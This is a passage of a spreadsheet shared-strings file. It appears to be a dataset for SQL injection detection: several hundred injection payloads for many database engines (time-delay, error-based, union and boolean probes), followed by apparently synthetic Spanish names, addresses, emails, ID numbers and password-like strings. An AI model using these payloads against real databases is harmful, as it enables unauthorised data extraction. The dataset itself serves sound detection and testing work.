    <t>1%"  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) vwyq ) #</t>
  </si>
  <si>
    <t>1%'  )  )   union all select null,null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>1" )  as nqtn where 5606 = 5606 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>select pg_sleep ( 5 )  and   (  (  "byhx" like "byhx</t>
  </si>
  <si>
    <t>1 )  where 9552 = 9552 and 1961 = 6333--</t>
  </si>
  <si>
    <t>1" )  as htyo where 8322 = 8322 and 4595 = 4595#</t>
  </si>
  <si>
    <t xml:space="preserve">-7236 or make_set ( 9618 = 6919,6919 ) </t>
  </si>
  <si>
    <t>1  )  )   as ojjk where 3687 = 3687 and  ( 4833 = 9218 ) *9218--</t>
  </si>
  <si>
    <t>1' )  or row ( 1045,7562 ) &gt; ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 1045 = 1045,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from  ( select 8488 union select 5584 union select 3051 union select 1210 ) a group by x )  and  ( 'xzlx' like 'xzlx</t>
  </si>
  <si>
    <t>1'|| ( select 'bifa' where 6077 = 6077 and 4547 = 9301</t>
  </si>
  <si>
    <t>1" union all select null#</t>
  </si>
  <si>
    <t>-2382%' )  union all select 8885,8885,8885,8885,8885,8885,8885#</t>
  </si>
  <si>
    <t>-8028%'  )  )   )  or 5042 = 5214</t>
  </si>
  <si>
    <t>-4695'  )  )   )  union all select 5844,5844,5844,5844,5844,5844#</t>
  </si>
  <si>
    <t>1%'  )  )   )  and char ( 109 ) ||char ( 79 ) ||char ( 70 ) ||char ( 90 )  = regexp_substring ( repeat ( right ( char ( 5012 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1" where 6352 = 6352</t>
  </si>
  <si>
    <t>-7984' order by 1--</t>
  </si>
  <si>
    <t>1"  )  )   )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and   (  (   ( "tzqk" like "tzqk</t>
  </si>
  <si>
    <t>-2658 )  as casi where 7364 = 7364 or 8245 = 9651--</t>
  </si>
  <si>
    <t>select count ( * )  from generate_series ( 1,5000000 )  and   (  (   ( "wdbg" like "wdbg</t>
  </si>
  <si>
    <t>1"  )  )   as yuqr where 7226 = 7226 and  ( select * from  ( select ( sleep ( 5  )  )   ) gcrr ) #</t>
  </si>
  <si>
    <t>1"  )  )   as qrok where 8257 = 8257 or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t xml:space="preserve"> else dbms_lock.sleep ( 0 ) </t>
  </si>
  <si>
    <t>1' )  and  ( 3020 = 3020 ) *6703</t>
  </si>
  <si>
    <t>1  )  )   )  and make_set ( 8882 = 1593,1593 )  and   (  (   ( 7989 = 7989</t>
  </si>
  <si>
    <t>-6731" where 6166 = 6166 union all select 6166,6166,6166,6166,6166,6166--</t>
  </si>
  <si>
    <t>1%' and 7366 = 9197#</t>
  </si>
  <si>
    <t>1"  )  )   )  and make_set ( 6751 = 8128,8128 )  and   (  (   ( "uhiy" = "uhiy</t>
  </si>
  <si>
    <t>-9007 )  as gill where 6462 = 6462 union all select 6462,6462,6462,6462,6462,6462,6462,6462,6462#</t>
  </si>
  <si>
    <t>1" rlike  ( select  ( case when  ( 3711 = 3313 )  then 1 else 0x28 end  )  )   and "iqlh" like "iqlh</t>
  </si>
  <si>
    <t>1'|| ( select 'uebk' from dual where 6990 = 6990</t>
  </si>
  <si>
    <t>1'+ ( select pxrg where 5589 = 5589 or 5356 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1 )  and 7756 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 7756 = 7756 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   ) </t>
  </si>
  <si>
    <t>-8109%"  )  )   union all select 9089,9089--</t>
  </si>
  <si>
    <t>1%" procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and "%" = "</t>
  </si>
  <si>
    <t>1%' and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and '%' = '</t>
  </si>
  <si>
    <t>-8521' )  union all select 2446,2446,2446,2446,2446,2446,2446#</t>
  </si>
  <si>
    <t>1%" )  or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( "%" = "</t>
  </si>
  <si>
    <t>-4165" where 1772 = 1772 union all select 1772,1772,1772,1772,1772,1772,1772,1772--</t>
  </si>
  <si>
    <t>1'|| ( select 'aair' where 9234 = 9234 union all select null,null,null,null#</t>
  </si>
  <si>
    <t>1 waitfor delay '0:0:5'--</t>
  </si>
  <si>
    <t>1' )  where 8348 = 8348 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1%" )  or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1' )  as zxho where 5907 = 5907 or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1  )  )   )  or sleep ( 5 )  and   (  (   ( 2209 = 2209</t>
  </si>
  <si>
    <t>1' )  where 5276 = 5276 union all select null,null--</t>
  </si>
  <si>
    <t>1" and  ( select 2* ( if  (  (  select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 3484 = 3484,1  )  )   ) ,0x717a767a71,0x78  )  )  s ) , 8446744073709551610, 8446744073709551610  )  )   )  and "svse" = "svse</t>
  </si>
  <si>
    <t>1'+ ( select 'zxxh' where 4065 = 4065 and 8635 =  ( select count ( * )  from generate_series ( 1,5000000  )  )  --</t>
  </si>
  <si>
    <t>1 )  where 4866 = 4866</t>
  </si>
  <si>
    <t>1  )  )   as ctqr where 2609 = 2609</t>
  </si>
  <si>
    <t>1%" or sleep ( 5 ) #</t>
  </si>
  <si>
    <t>1 )  where 5651 = 5651</t>
  </si>
  <si>
    <t>1 )  as jvuo where 6859 = 6859 union all select null,null,null,null,null,null,null#</t>
  </si>
  <si>
    <t>-3304'  )  )   order by 1--</t>
  </si>
  <si>
    <t>call regexp_substring ( repeat ( right ( char ( 3702 ) ,0 ) ,500000000 ) ,null  )  )  +'</t>
  </si>
  <si>
    <t>1'  )  )   as clhk where 4607 = 4607 or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-3316%" or 3440 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 3440 = 3440 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )  </t>
  </si>
  <si>
    <t>1" )  or elt ( 6272 = 6272,sleep ( 5  )  )   and  ( "fvrq" = "fvrq</t>
  </si>
  <si>
    <t>-5857%"  )  )   or 5023 = ctxsys.drithsx.sn ( 5023, ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 5023 = 5023 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) |</t>
  </si>
  <si>
    <t>-5845'  )  )   )  union all select 3595,3595,3595,3595,3595,3595,3595,3595,3595#</t>
  </si>
  <si>
    <t>-2679'  )  )   )  or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||ch</t>
  </si>
  <si>
    <t>1'  )  )   and make_set ( 8403 = 8403,8899 )  and   (  (  'lokx' like 'lokx</t>
  </si>
  <si>
    <t>1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'khah' like 'khah</t>
  </si>
  <si>
    <t>-3952' )  union all select 6644,6644,6644--</t>
  </si>
  <si>
    <t>1'  )  )   as kgfp where 2366 = 2366</t>
  </si>
  <si>
    <t>select dbms_pipe.receive_message ( chr ( 66 ) ||chr ( 67 ) ||chr ( 79 ) ||chr ( 101 ) ,5 )  from dual and   (  (  'quqx' = 'quqx</t>
  </si>
  <si>
    <t>1' )  where 3476 = 3476 and elt ( 1210 = 1210,sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1'|| ( select 'lkmh' where 7659 = 7659</t>
  </si>
  <si>
    <t>1" )  as firv where 4522 = 4522 or 2367 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1' )  and 2564 = 3234--</t>
  </si>
  <si>
    <t xml:space="preserve">-5062 )  where 7457 = 7457 or 4144 =  ( select upper ( xmltype ( chr ( 60 ) ||chr ( 58 ) ||chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4144 = 4144 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr </t>
  </si>
  <si>
    <t>1'|| ( select 'vpuh' where 8164 = 8164</t>
  </si>
  <si>
    <t>-2790%" )  union all select 5070,5070#</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 3787 = 7750--</t>
  </si>
  <si>
    <t>1'|| ( select 'vdeo' where 4355 = 4355</t>
  </si>
  <si>
    <t>1' or char ( 117 ) ||char ( 111 ) ||char ( 105 ) ||char ( 100 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and 'nelb' = 'nelb</t>
  </si>
  <si>
    <t>-4932%"  )  )   or  ( 3076 = 5927 ) *5927 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1"  )  )   and exp ( ~ ( select * from  ( select concat ( 0x7171706a71, ( select  ( elt ( 8190 = 8190,1  )  )   ) ,0x717a767a71,0x78  )  )  x  )  )   and   (  (  "kvpy" = "kvpy</t>
  </si>
  <si>
    <t>1%"  )  )   )  or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1  )  )   or  ( select 9173 from ( select count ( * ) ,concat ( 0x7171706a71, ( select  ( elt ( 9173 = 9173,1  )  )   ) ,0x717a767a71,floor ( rand ( 0 ) *2  )  )  x from information_schema.character_sets group by x ) a )  and   (  (  5137 = 5137</t>
  </si>
  <si>
    <t>1'|| ( select 'yyil' from dual where 3121 = 3121</t>
  </si>
  <si>
    <t>1' )  where 2840 = 2840</t>
  </si>
  <si>
    <t>-8677'|| ( select 'ihpm' from dual where 9571 = 9571 union all select 9571,9571,9571,9571,9571,9571,9571,9571,9571,9571--</t>
  </si>
  <si>
    <t>1  )  )   as efjb where 4642 = 4642 order by 1#</t>
  </si>
  <si>
    <t>-7271'  )  )   )  or make_set ( 9354 = 9354,7185 )  and   (  (   ( 'mdtw' = 'mdtw</t>
  </si>
  <si>
    <t>1%'  )  )   and elt ( 4483 = 5364,5364 )  and   (  (  '%' = '</t>
  </si>
  <si>
    <t>1 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1%"  )  )   and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-4876"  )  )   as saug where 2256 = 2256 union all select 2256,2256,2256,2256,2256,2256,2256,2256,2256,2256--</t>
  </si>
  <si>
    <t>1 )  where 4653 = 4653 or 6793 =  ( select 6793 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>-8869" where 3019 = 3019 union all select 3019,3019,3019#</t>
  </si>
  <si>
    <t>1%"  )  )   )  and elt ( 4249 = 4249,7259 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>1" )  as piwi where 2918 = 2918</t>
  </si>
  <si>
    <t>1' in boolean mode )  and 9198 = 9198--</t>
  </si>
  <si>
    <t>-1579%'  )  )   )  union all select 7272#</t>
  </si>
  <si>
    <t>select benchmark ( 5000000,md5 ( 0x4c4d6142  )  )   and  ( "poik" = "poik</t>
  </si>
  <si>
    <t>-9684" order by 1#</t>
  </si>
  <si>
    <t>1' )  or 7552 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 )  and  ( 'jhxh' = 'jhxh</t>
  </si>
  <si>
    <t>1'  )  )   )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and   (  (   ( 'gfll' = 'gfll</t>
  </si>
  <si>
    <t>-3902'  )  )   )  union all select 3999,3999,3999,3999,3999,3999,3999,3999,3999#</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   as eveb where 7567 = 7567</t>
  </si>
  <si>
    <t xml:space="preserve">1, ( convert ( int, ( select char ( 113 ) +char ( 113 ) +char ( 112 ) +char ( 106 ) +char ( 113 ) + ( select  ( case when  ( 4932 = 4932 )  then char ( 49 )  else char ( 48 )  end  )  )  +char ( 113 ) +char ( 122 ) +char ( 118 ) +char ( 122 ) +char ( 113  )  )    )  )  </t>
  </si>
  <si>
    <t>1%"  )  )   and  ( 7817 = 4371 ) *4371 and   (  (  "%" = "</t>
  </si>
  <si>
    <t>1' )  as pghp where 9086 = 9086</t>
  </si>
  <si>
    <t>-8181'  )  )   or 5926 = 3332#</t>
  </si>
  <si>
    <t>1' )  and updatexml ( 3393,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 3393 = 3393,1  )  )   ) ,0x717a767a71 ) ,1161 )  and  ( 'ngxz' = 'ngxz</t>
  </si>
  <si>
    <t>-4093'  )  )   union all select 5785,5785,5785#</t>
  </si>
  <si>
    <t>1 )  where 4992 = 4992</t>
  </si>
  <si>
    <t>1' )  and  ( select * from  ( select ( sleep ( 5  )  )   ) fzno )  and  ( 'mqoj' like 'mqoj</t>
  </si>
  <si>
    <t>1'|| ( select 'gtri' from dual where 7097 = 7097 and elt ( 1210 = 1210,sleep ( 5  )  )   ) ||'</t>
  </si>
  <si>
    <t>-2340%" order by 1#</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and "%" = "</t>
  </si>
  <si>
    <t>1 where 4468 = 4468 or char ( 75 ) ||char ( 70 ) ||char ( 99 ) ||char ( 83 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null ) --</t>
  </si>
  <si>
    <t>-6202  )  )   or 7845 = 1962--</t>
  </si>
  <si>
    <t>1'|| ( select 'rdqv' from dual where 1894 = 1894</t>
  </si>
  <si>
    <t>1 )  rlike  ( select  ( case when  ( 7689 = 7689 )  then 1 else 0x28 end  )  )   and  ( 1073 = 1073</t>
  </si>
  <si>
    <t>1%' )  or 8421 =  ( select count ( * )  from generate_series ( 1,5000000  )  )   and  ( '%' = '</t>
  </si>
  <si>
    <t>1 where 9072 = 9072 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>1" )  as jngl where 8384 = 8384 and 4580 = 1718--</t>
  </si>
  <si>
    <t>1  )  )   )  rlike  ( select * from  ( select ( sleep ( 5  )  )   ) sgvo )  and   (  (   ( 4574 = 4574</t>
  </si>
  <si>
    <t>1%' )  union all select null,null,null,null,null,null--</t>
  </si>
  <si>
    <t>-3982  )  )   or 6872 = 6872 and   (  (  6331 = 6331</t>
  </si>
  <si>
    <t>1%" and  ( 2850 = 6610 ) *6610 and "%" = "</t>
  </si>
  <si>
    <t>1'+ ( select nvht where 9118 = 9118 or 8315 =  ( select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3  )  )  +'</t>
  </si>
  <si>
    <t>-9562' or 8571 = 8571--</t>
  </si>
  <si>
    <t>1%"  )  )   )  or 2633 = dbms_pipe.receive_message ( chr ( 112 ) ||chr ( 65 ) ||chr ( 65 ) ||chr ( 103 ) ,5 )  and   (  (   ( "%" = "</t>
  </si>
  <si>
    <t>-8086%' )  or 4493 = utl_inaddr.get_host_address ( chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4493 = 4493 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||ch</t>
  </si>
  <si>
    <t xml:space="preserve">elt ( 2567 = 9921,9921 ) </t>
  </si>
  <si>
    <t>-7579%" or 6570 = 1764</t>
  </si>
  <si>
    <t>1'  )  )   and 3355 = 6012 and   (  (  'ofmy' = 'ofmy</t>
  </si>
  <si>
    <t>1' )  as wtfo where 5666 = 5666 union all select null,null,null,null--</t>
  </si>
  <si>
    <t xml:space="preserve"> ( cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select 1 from generate_series ( 9815,9815,case when  ( 9815 = 9815 )  then 1 else 0 end )  limit 1 ) ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric  )  )  </t>
  </si>
  <si>
    <t>1 )  and 6510 =  ( select count ( * )  from sysusers as sys1,sysusers as sys2,sysusers as sys3,sysusers as sys4,sysusers as sys5,sysusers as sys6,sysusers as sys7 )  and  ( 9841 = 9841</t>
  </si>
  <si>
    <t>1" )  where 7753 = 7753</t>
  </si>
  <si>
    <t>select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 and   (  (   ( 5324 = 5324</t>
  </si>
  <si>
    <t>1' )  or updatexml ( 1808,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 1808 = 1808,1  )  )   ) ,0x717a767a71 ) ,8666 )  and  ( 'iifh' = 'iifh</t>
  </si>
  <si>
    <t>select count ( * )  from sysibm.systables as t1,sysibm.systables as t2,sysibm.systables as t3 and 'osqf' = 'osqf</t>
  </si>
  <si>
    <t xml:space="preserve">1 and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric ) </t>
  </si>
  <si>
    <t>select * from generate_series ( 7754,7754,case when  ( 7754 = 1252 )  then 1 else 0 end )  limit 1--</t>
  </si>
  <si>
    <t>1' )  and char ( 111 ) ||char ( 77 ) ||char ( 121 ) ||char ( 88 )  = regexp_substring ( repeat ( left ( crypt_key ( char ( 65 ) ||char ( 69 ) ||char ( 83 ) ,null ) ,0 ) ,500000000 ) ,null )  and  ( 'adjc' = 'adjc</t>
  </si>
  <si>
    <t>-9178 where 2253 = 2253 union all select 2253,2253,2253,2253,2253,2253,2253,2253#</t>
  </si>
  <si>
    <t>1 )  or 4240 =  ( select 4240 from pg_sleep ( 5  )  )  --</t>
  </si>
  <si>
    <t>1  )  )   )  or 4915 =  ( select count ( * )  from domain.domains as t1,domain.columns as t2,domain.tables as t3 ) --</t>
  </si>
  <si>
    <t>1' where 8437 = 8437 and make_set ( 8403 = 8403,8899 ) --</t>
  </si>
  <si>
    <t>1' )  union all select null,null,null#</t>
  </si>
  <si>
    <t>1'  )  )   )  and 5934 = 2309</t>
  </si>
  <si>
    <t>-9721' )  or 9287 = 4362#</t>
  </si>
  <si>
    <t>-5779 )  union all select 6089,6089--</t>
  </si>
  <si>
    <t xml:space="preserve">iif ( 9342 = 6508,1,1/0 ) </t>
  </si>
  <si>
    <t>1" )  where 6128 = 6128 and char ( 120 ) ||char ( 106 ) ||char ( 117 ) ||char ( 85 )  = regexp_substring ( repeat ( right ( char ( 9981 ) ,0 ) ,5000000000 ) ,null ) --</t>
  </si>
  <si>
    <t>1 and 9660 =  ( select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 ) --</t>
  </si>
  <si>
    <t>1 and elt ( 1210 = 1210,sleep ( 5  )  )  # macc</t>
  </si>
  <si>
    <t xml:space="preserve">1', ( select  ( case when  ( 5217 = 5217 )  then 1 else 5217* ( select 5217 from mysql.db )  end  )  )  </t>
  </si>
  <si>
    <t>1" )  as hymr where 5497 = 5497 union all select null,null,null,null--</t>
  </si>
  <si>
    <t>-4745" or 5903 =  ( 'qqpjq'|| ( select case 5903 when 5903 then 1 else 0 end from rdb$database ) ||'qzvzq' )  and "nifq" like "nifq</t>
  </si>
  <si>
    <t xml:space="preserve"> ( updatexml ( 8862,concat ( 0x2e,0x7171706a71, ( select  ( elt ( 8862 = 8862,1  )  )   ) ,0x717a767a71 ) ,8981  )  )  </t>
  </si>
  <si>
    <t>-9008' )  union all select 4976,4976,4976,4976#</t>
  </si>
  <si>
    <t>-9809' order by 1--</t>
  </si>
  <si>
    <t>select  ( case when  ( 4059 = 7807 )  then 4059 else 1/ ( select 0 )  end ) --</t>
  </si>
  <si>
    <t>1" )  where 8571 = 8571 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">-8448%" or 4747 = dbms_utility.sqlid_to_sqlhash  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113 ) || ( select  ( case when  ( 4747 = 4747 )  then 1 else 0 end )  from dual ) ||chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) </t>
  </si>
  <si>
    <t xml:space="preserve">1' rlike sleep ( 5 ) </t>
  </si>
  <si>
    <t>-7126'  )  )   as fzpp where 8078 = 8078 union all select 8078,8078,8078,8078,8078,8078,8078#</t>
  </si>
  <si>
    <t>1' )  and 2853 = cast  (  (  chr ( 113 ) ||chr ( 113 ) ||chr ( 112 ) ||chr ( 106 ) ||chr ( 113  )  )  || ( select  ( case when  ( 2853 = 2853 )  then 1 else 0 end  )  )  ::text|| ( chr ( 113 ) ||chr ( 122 ) ||chr ( 118 ) ||chr ( 122 ) ||chr ( 113  )  )   as numeric )  and  ( 'xazf' = 'xazf</t>
  </si>
  <si>
    <t>1'  )  )   )  and 8312 = dbms_pipe.receive_message ( chr ( 69 ) ||chr ( 79 ) ||chr ( 101 ) ||chr ( 68 ) ,5 ) --</t>
  </si>
  <si>
    <t>1' where 2373 = 2373 union all select null,null#</t>
  </si>
  <si>
    <t>1%"  )  )   or 6979 = like ( 'abcdefg',upper ( hex ( randomblob ( 500000000/2  )  )    )  )  --</t>
  </si>
  <si>
    <t>1'+ ( select smze where 5616 = 5616</t>
  </si>
  <si>
    <t>1'  )  )   as anaq where 9605 = 9605 and elt ( 4249 = 4249,7259 ) --</t>
  </si>
  <si>
    <t>-6815 )  where 2498 = 2498 union all select 2498,2498,2498,2498,2498--</t>
  </si>
  <si>
    <t>1%" )  or sleep ( 5 )  and  ( "%" = "</t>
  </si>
  <si>
    <t>1 )  procedure analyse ( extractvalue ( 5840,concat ( 0x5c,0x7171706a71, ( select  ( case when  ( 5840 = 5840 )  then 1 else 0 end  )  )  ,0x717a767a71  )  )  ,1 )  and  ( 6986 = 6986</t>
  </si>
  <si>
    <t>1  )  )   as bsvo where 3605 = 3605</t>
  </si>
  <si>
    <t>1%"  )  )   rlike  ( select  ( case when  ( 4207 = 1757 )  then 1 else 0x28 end  )  )   and   (  (  "%" = "</t>
  </si>
  <si>
    <t>-1769 union all select 6054--</t>
  </si>
  <si>
    <t>1" )  waitfor delay '0:0:5' and  ( "vjpg" = "vjpg</t>
  </si>
  <si>
    <t>-7600' or 7684 = 3181#</t>
  </si>
  <si>
    <t>1'+ ( select mkbv where 1648 = 1648 and 9254 =  ( select count ( * )  from rdb$fields as t1,rdb$types as t2,rdb$collations as t3,rdb$functions as t4 ) --</t>
  </si>
  <si>
    <t>1" )  as yzzk where 1813 = 1813 and  ( 3020 = 3020 ) *6703--</t>
  </si>
  <si>
    <t>select count ( * )  from all_users t1,all_users t2,all_users t3,all_users t4,all_users t5 and "vcup" = "vcup</t>
  </si>
  <si>
    <t>select sleep ( 5 ) --</t>
  </si>
  <si>
    <t xml:space="preserve">1' )  and sleep ( 5 ) </t>
  </si>
  <si>
    <t>-5617 )  where 2132 = 2132 union all select 2132,2132,2132,2132#</t>
  </si>
  <si>
    <t>-2316%' union all select 8636,8636,8636,8636,8636,8636,8636--</t>
  </si>
  <si>
    <t>yebra de basa</t>
  </si>
  <si>
    <t>castejon quiroga</t>
  </si>
  <si>
    <t>zulaica</t>
  </si>
  <si>
    <t>e88r6bera</t>
  </si>
  <si>
    <t>pea barnera</t>
  </si>
  <si>
    <t>clodomiro</t>
  </si>
  <si>
    <t>c/ cesareo gonzalez, 170</t>
  </si>
  <si>
    <t>calle huesca, 136,</t>
  </si>
  <si>
    <t>mo!ralidad</t>
  </si>
  <si>
    <t>09767374x</t>
  </si>
  <si>
    <t>ea</t>
  </si>
  <si>
    <t>hewson@elrincondelmarmol.ar</t>
  </si>
  <si>
    <t>buchko</t>
  </si>
  <si>
    <t>5osan$9a</t>
  </si>
  <si>
    <t>calistrato</t>
  </si>
  <si>
    <t>malethia</t>
  </si>
  <si>
    <t>arres</t>
  </si>
  <si>
    <t>jacarandina</t>
  </si>
  <si>
    <t>aufaure@asesoriaviesca.bj</t>
  </si>
  <si>
    <t>ziga</t>
  </si>
  <si>
    <t>carnalmente</t>
  </si>
  <si>
    <t>tefilo</t>
  </si>
  <si>
    <t>calle goletera 30, 6a</t>
  </si>
  <si>
    <t>tr1qu7flo5</t>
  </si>
  <si>
    <t>san fernando de henares</t>
  </si>
  <si>
    <t>r3ic5</t>
  </si>
  <si>
    <t>pettitt</t>
  </si>
  <si>
    <t>camita</t>
  </si>
  <si>
    <t>c/ el cedro s/n, 2-c</t>
  </si>
  <si>
    <t>pl. vianako printzearen, 107 12h</t>
  </si>
  <si>
    <t>famery@noticiasenvivo.ie</t>
  </si>
  <si>
    <t>jose incenga 14,</t>
  </si>
  <si>
    <t>novau pola</t>
  </si>
  <si>
    <t>malcaso</t>
  </si>
  <si>
    <t>piggot@necesitouncredito.np</t>
  </si>
  <si>
    <t>33t40io4a563</t>
  </si>
  <si>
    <t>alameda de gardn, la</t>
  </si>
  <si>
    <t>laneuville@hangarcentrodelautomovil.sh</t>
  </si>
  <si>
    <t>beniarj</t>
  </si>
  <si>
    <t>calle costa de llevant, 52</t>
  </si>
  <si>
    <t>tele</t>
  </si>
  <si>
    <t>juan de dios</t>
  </si>
  <si>
    <t>shalom</t>
  </si>
  <si>
    <t>nakagome</t>
  </si>
  <si>
    <t>09529349n</t>
  </si>
  <si>
    <t>68201502q</t>
  </si>
  <si>
    <t>c/ motilla 19, 1c</t>
  </si>
  <si>
    <t>pleasande@doloresmusculares.aq</t>
  </si>
  <si>
    <t>c/ cordoba, 30</t>
  </si>
  <si>
    <t>m9ncilla57</t>
  </si>
  <si>
    <t>teobaldo</t>
  </si>
  <si>
    <t>gollu</t>
  </si>
  <si>
    <t>599iad12a</t>
  </si>
  <si>
    <t>telletxe, 119,</t>
  </si>
  <si>
    <t>remus</t>
  </si>
  <si>
    <t>abell lamarca</t>
  </si>
  <si>
    <t>friels-devereaux3@enformetera.com.fr</t>
  </si>
  <si>
    <t>28rt27r1</t>
  </si>
  <si>
    <t>adulatorio</t>
  </si>
  <si>
    <t>santa maria de merls</t>
  </si>
  <si>
    <t>sebastian_ferdi@tintaultravioleta.mv</t>
  </si>
  <si>
    <t>grado, el</t>
  </si>
  <si>
    <t>asentis21</t>
  </si>
  <si>
    <t>masaguer pardinas</t>
  </si>
  <si>
    <t>c48mari1e5a</t>
  </si>
  <si>
    <t>60537126e</t>
  </si>
  <si>
    <t>golpeadura</t>
  </si>
  <si>
